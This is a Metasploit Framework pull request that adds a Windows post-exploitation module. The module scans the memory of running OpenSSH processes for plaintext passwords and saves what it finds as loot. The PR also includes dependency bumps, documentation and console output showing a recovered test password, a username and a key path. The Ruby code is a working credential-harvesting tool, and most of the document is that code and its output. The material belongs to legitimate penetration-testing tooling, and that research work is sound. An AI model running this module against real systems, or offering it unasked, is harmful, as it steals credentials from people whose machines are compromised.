### PR TITLE
Add OpenSSH password search module for Windows

### DIFF
--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -33,7 +33,7 @@ PATH
       metasploit-concern
       metasploit-credential
       metasploit-model
-      metasploit-payloads (= 2.0.161)
+      metasploit-payloads (= 2.0.163)
       metasploit_data_models
       metasploit_payloads-mettle (= 1.0.26)
       mqtt
@@ -278,7 +278,7 @@ GEM
       activemodel (~> 7.0)
       activesupport (~> 7.0)
       railties (~> 7.0)
-    metasploit-payloads (2.0.161)
+    metasploit-payloads (2.0.163)
     metasploit_data_models (6.0.3)
       activerecord (~> 7.0)
       activesupport (~> 7.0)

--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -33,7 +33,7 @@ PATH
       metasploit-concern
       metasploit-credential
       metasploit-model
-      metasploit-payloads (= 2.0.163)
+      metasploit-payloads (= 2.0.164)
       metasploit_data_models
       metasploit_payloads-mettle (= 1.0.26)
       mqtt
@@ -278,7 +278,7 @@ GEM
       activemodel (~> 7.0)
       activesupport (~> 7.0)
       railties (~> 7.0)
-    metasploit-payloads (2.0.163)
+    metasploit-payloads (2.0.164)
     metasploit_data_models (6.0.3)
       activerecord (~> 7.0)
       activesupport (~> 7.0)

--- a/documentation/modules/post/windows/gather/openssh_password_search.md
+++ b/documentation/modules/post/windows/gather/openssh_password_search.md
@@ -1,0 +1,65 @@
+## Vulnerable Application
+
+This module allows for searching the memory space of running OpenSSH processes on Windows 
+for potentially sensitive data such as passwords.
+
+## Verification Steps
+
+1. Start `msfconsole`
+2. Get a Meterpreter session
+3. Do: `use post/windows/gather/openssh_password_search`
+4. Do: `set SESSION <Session ID>`
+5. Do: `set PID <Process ID>`
+6. Do: `run`
+
+## Options
+
+### PID
+
+The process ID of the OpenSSH target process. (default: `nil`)
+
+### REGEX
+
+The regular expression to search for in process memory. (default: `publickey,password.*`)
+
+### MIN_MATCH_LEN
+
+The minimum match length. (default: `5`)
+
+### MAX_MATCH_LEN
+
+The maximum match length. (default: `127`)
+
+### REPLACE_NON_PRINTABLE_BYTES
+
+Replace non-printable bytes with `.` when outputting the results. (default: `true`)
+
+
+## Scenarios
+
+### Windows 10 - OpenSSH_9.4p1, OpenSSL 3.1.2 1 Aug 2023
+In this scenario, the Windows target is connected to a different host using `ssh.exe` using the password `myverysecretpassword`.
+```
+msf6 post(windows/gather/openssh_password_search) > sessions
+
+Active sessions
+===============
+
+  Id  Name  Type                     Information                              Connection
+  --  ----  ----                     -----------                              ----------
+  1         meterpreter x64/windows  DESKTOP-NO8VQQB\win10 @ DESKTOP-NO8VQQB  192.168.112.1:4444 -> 192.168.112.129:59376 (192.168.112.129)
+  
+
+msf6 post(windows/gather/openssh_password_search) > run pid=8780 session=-1
+
+[*] Running module against - DESKTOP-NO8VQQB\win10 @ DESKTOP-NO8VQQB (192.168.112.129). This might take a few seconds...
+[*] Memory Matches for OpenSSH
+==========================
+
+ Match Address       Match Length  Match Buffer                                                                                                      Memory Region Start  Memory Region Size
+ -------------       ------------  ------------                                                                                                      -------------------  ------------------
+ 0x0000000A00060EE0  127           "publickey,password......3.......myverysecretpassword....................#.........#.....................#......  0x0000000A00000000   0x0000000000090000
+                                   .client-session."
+
+[*] Post module execution completed
+```

--- a/metasploit-framework.gemspec
+++ b/metasploit-framework.gemspec
@@ -72,7 +72,7 @@ Gem::Specification.new do |spec|
   # are needed when there's no database
   spec.add_runtime_dependency 'metasploit-model'
   # Needed for Meterpreter
-  spec.add_runtime_dependency 'metasploit-payloads', '2.0.161'
+  spec.add_runtime_dependency 'metasploit-payloads', '2.0.163'
   # Needed for the next-generation POSIX Meterpreter
   spec.add_runtime_dependency 'metasploit_payloads-mettle', '1.0.26'
   # Needed by msfgui and other rpc components

--- a/metasploit-framework.gemspec
+++ b/metasploit-framework.gemspec
@@ -72,7 +72,7 @@ Gem::Specification.new do |spec|
   # are needed when there's no database
   spec.add_runtime_dependency 'metasploit-model'
   # Needed for Meterpreter
-  spec.add_runtime_dependency 'metasploit-payloads', '2.0.163'
+  spec.add_runtime_dependency 'metasploit-payloads', '2.0.164'
   # Needed for the next-generation POSIX Meterpreter
   spec.add_runtime_dependency 'metasploit_payloads-mettle', '1.0.26'
   # Needed by msfgui and other rpc components

--- a/modules/post/windows/gather/openssh_password_search.rb
+++ b/modules/post/windows/gather/openssh_password_search.rb
@@ -1,0 +1,146 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Post
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Windows OpenSSH Password Search',
+        'Description' => %q{
+          This module allows for searching the memory space of running OpenSSH processes on Windows
+          for potentially sensitive data such as passwords.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => ['sjanusz-r7'],
+        'Platform' => ['win'],
+        'SessionTypes' => ['meterpreter'],
+        'Compat' => {
+          'Meterpreter' => {
+            'Commands' => %w[
+              stdapi_sys_process_memory_search
+            ]
+          }
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [],
+          'SideEffects' => []
+        }
+      )
+    )
+    register_options([
+      OptInt.new('PID', [true, 'Process ID of OpenSSH to search through', nil]),
+      OptString.new('REGEX', [true, 'Regular expression to search for with in memory', 'publickey,password.*']),
+      OptInt.new('MIN_MATCH_LEN', [true, 'The minimum number of bytes to match', 5]),
+      OptInt.new('MAX_MATCH_LEN', [true, 'The maximum number of bytes to match', 127]),
+      OptBool.new('REPLACE_NON_PRINTABLE_BYTES', [true, 'Replace non-printable bytes with "."', true])
+    ])
+  end
+
+  def pid
+    datastore['PID']
+  end
+
+  def regex
+    datastore['REGEX']
+  end
+
+  def min_match_len
+    datastore['MIN_MATCH_LEN']
+  end
+
+  def max_match_len
+    datastore['MAX_MATCH_LEN']
+  end
+
+  def replace_non_printable_bytes
+    datastore['REPLACE_NON_PRINTABLE_BYTES']
+  end
+
+  def mem_search(pid, needle, min_search_len, match_len)
+    request = ::Rex::Post::Meterpreter::Packet.create_request(::Rex::Post::Meterpreter::Extensions::Stdapi::COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_SEARCH)
+
+    request.add_tlv(::Rex::Post::Meterpreter::Extensions::Stdapi::TLV_TYPE_PID, pid)
+    request.add_tlv(::Rex::Post::Meterpreter::Extensions::Stdapi::TLV_TYPE_MEMORY_SEARCH_NEEDLE, needle)
+    request.add_tlv(::Rex::Post::Meterpreter::Extensions::Stdapi::TLV_TYPE_MEMORY_SEARCH_MATCH_LEN, match_len)
+    request.add_tlv(::Rex::Post::Meterpreter::TLV_TYPE_UINT, min_search_len)
+
+    session.send_request(request)
+  end
+
+  def non_printable?(byte)
+    byte < 0x21 || byte > 0x7E
+  end
+
+  def print_results(results: [])
+    if results.empty?
+      print_status 'No regular expression matches were found in memory'
+      return
+    end
+
+    results_table = ::Rex::Text::Table.new(
+      'Header' => 'Memory Matches for OpenSSH',
+      'Indent' => 1,
+      'Columns' => ['Match Address', 'Match Length', 'Match Buffer', 'Memory Region Start', 'Memory Region Size']
+    )
+
+    x64_architectures = [
+      ARCH_X64,
+      ARCH_AARCH64
+    ]
+    address_length = x64_architectures.include?(session.native_arch) ? 16 : 8
+
+    results.each do |result|
+      match_address = result.get_tlv(::Rex::Post::Meterpreter::Extensions::Stdapi::TLV_TYPE_MEMORY_SEARCH_MATCH_ADDR).value.to_s(16).upcase
+      match_length = result.get_tlv(::Rex::Post::Meterpreter::Extensions::Stdapi::TLV_TYPE_MEMORY_SEARCH_MATCH_LEN).value
+      match_buffer = result.get_tlv(::Rex::Post::Meterpreter::Extensions::Stdapi::TLV_TYPE_MEMORY_SEARCH_MATCH_STR).value
+      region_start_address = result.get_tlv(::Rex::Post::Meterpreter::Extensions::Stdapi::TLV_TYPE_MEMORY_SEARCH_START_ADDR).value.to_s(16).upcase
+      region_start_size = result.get_tlv(::Rex::Post::Meterpreter::Extensions::Stdapi::TLV_TYPE_MEMORY_SEARCH_SECT_LEN).value.to_s(16).upcase
+
+      if replace_non_printable_bytes
+        match_buffer = match_buffer.bytes.map { |byte| non_printable?(byte) ? '.' : byte.chr }.join
+      end
+
+      results_table << [
+        "0x#{match_address.rjust(address_length, '0')}",
+        match_length,
+        match_buffer.inspect,
+        "0x#{region_start_address.rjust(address_length, '0')}",
+        "0x#{region_start_size.rjust(address_length, '0')}"
+      ]
+    end
+
+    print_status results_table.to_s
+  end
+
+  def save_loot(results: [])
+    results.each do |result|
+      stored_loot = store_loot(
+        'openssh.buffer',
+        'bin',
+        session,
+        result.get_tlv_value(::Rex::Post::Meterpreter::Extensions::Stdapi::TLV_TYPE_MEMORY_SEARCH_MATCH_STR),
+        'openssh_buffer.bin',
+        'OpenSSH Process Raw Memory Buffer'
+      )
+      print_good("Loot stored to: #{stored_loot}")
+    end
+  end
+
+  def run
+    if session.type != 'meterpreter'
+      print_error 'Only Meterpreter sessions are supported by this post module'
+      return
+    end
+
+    print_status("Running module against - #{session.info} (#{session.session_host}). This might take a few seconds...")
+    results = mem_search(pid, regex, min_match_len, max_match_len)
+    group_tlv_results = results.get_tlvs(::Rex::Post::Meterpreter::Extensions::Stdapi::TLV_TYPE_MEMORY_SEARCH_RESULTS)
+    print_results(results: group_tlv_results)
+    save_loot(results: group_tlv_results)
+  end
+end

--- a/modules/post/windows/gather/openssh_password_search.rb
+++ b/modules/post/windows/gather/openssh_password_search.rb
@@ -72,10 +72,6 @@ class MetasploitModule < Msf::Post
     session.send_request(request)
   end
 
-  def non_printable?(byte)
-    byte < 0x21 || byte > 0x7E
-  end
-
   def print_results(results: [])
     if results.empty?
       print_status 'No regular expression matches were found in memory'
@@ -102,7 +98,7 @@ class MetasploitModule < Msf::Post
       region_start_size = result.get_tlv(::Rex::Post::Meterpreter::Extensions::Stdapi::TLV_TYPE_MEMORY_SEARCH_SECT_LEN).value.to_s(16).upcase
 
       if replace_non_printable_bytes
-        match_buffer = match_buffer.bytes.map { |byte| non_printable?(byte) ? '.' : byte.chr }.join
+        match_buffer = match_buffer.bytes.map { |byte| /[[:print:]]/.match?(byte.chr) ? byte.chr : '.' }.join
       end
 
       results_table << [


### PR DESCRIPTION
This PR adds a module that can be used to extract passwords from active OpenSSH connections on Windows where a password has been used. Private keys do not seem to be getting leaked in the same way, if at all. The affected version was  `OpenSSH_9.4p1, OpenSSL 3.1.2 1 Aug 2023`, with 9.5 not being affected.

This PR depends on changes made here: https://github.com/rapid7/metasploit-payloads/pull/686

Similar to Mettle's memory search implementation, you can modify the needle and PID to search other programs for potentially sensitive information being stored near needles.

## Verification

1. Start `msfconsole`
2. Get a Meterpreter session
3. Do: `use post/windows/gather/openssh_password_search`
4. Do: `set SESSION <Session ID>`
5. Do: `set PID <Process ID>`
6. Do: `run`

### Windows 10 - OpenSSH_9.4p1, OpenSSL 3.1.2 1 Aug 2023
In this scenario, the Windows target is connected to a different host using `ssh.exe` using the password `myverysecretpassword`.
```
msf6 post(windows/gather/openssh_password_search) > sessions
Active sessions
===============
  Id  Name  Type                     Information                              Connection
  --  ----  ----                     -----------                              ----------
  1         meterpreter x64/windows  DESKTOP-NO8VQQB\win10 @ DESKTOP-NO8VQQB  192.168.112.1:4444 -> 192.168.112.129:59376 (192.168.112.129)
  
msf6 post(windows/gather/openssh_password_search) > run pid=8780 session=-1
[*] Running module against - DESKTOP-NO8VQQB\win10 @ DESKTOP-NO8VQQB (192.168.112.129). This might take a few seconds...
[*] Memory Matches for OpenSSH
==========================
 Match Address       Match Length  Match Buffer                                                                                                      Memory Region Start  Memory Region Size
 -------------       ------------  ------------                                                                                                      -------------------  ------------------
 0x0000000A00060EE0  127           "publickey,password......3.......myverysecretpassword....................#.........#.....................#......  0x0000000A00000000   0x0000000000090000
                                   .client-session."
[*] Post module execution completed
```

## Getting Connection Info

You can also see what the username and potentially the private key used to connect is. In the below examples, I've used a user called `putty-memsearch-test` with a private key present on the target machine's desktop.

### Connecting with username + password
```
msf6 post(windows/gather/openssh_password_search) > run regex="ssh\.exe .*"

[*] Running module against - DESKTOP-NO8VQQB\win10 @ DESKTOP-NO8VQQB (192.168.112.129). This might take a few seconds...
[*] Memory Matches for OpenSSH
==========================

 Match Address       Match Length  Match Buffer                                                                                                      Memory Region Start  Memory Region Size
 -------------       ------------  ------------                                                                                                      -------------------  ------------------
 0x000000000075311F  127           "ssh.exe.putty-memsearch-test@192.168.112.132.............g.....................................................  0x0000000000750000   0x0000000000032000
                                   ................"

[*] Post module execution completed
```

### Connecting with username + private key
```
msf6 post(windows/gather/openssh_password_search) > run regex="ssh\.exe .*" pid=9084

[*] Running module against - DESKTOP-NO8VQQB\win10 @ DESKTOP-NO8VQQB (192.168.112.129). This might take a few seconds...
[*] Memory Matches for OpenSSH
==========================

 Match Address       Match Length  Match Buffer                                                                                                      Memory Region Start  Memory Region Size
 -------------       ------------  ------------                                                                                                      -------------------  ------------------
 0x00000000007B316F  127           "ssh.exe.-i./c/Users/win10/Desktop/putty-memsearch.putty-memsearch-test@192.168.112.132....g...3................  0x00000000007B0000   0x0000000000038000
                                   ................"

[*] Post module execution completed
```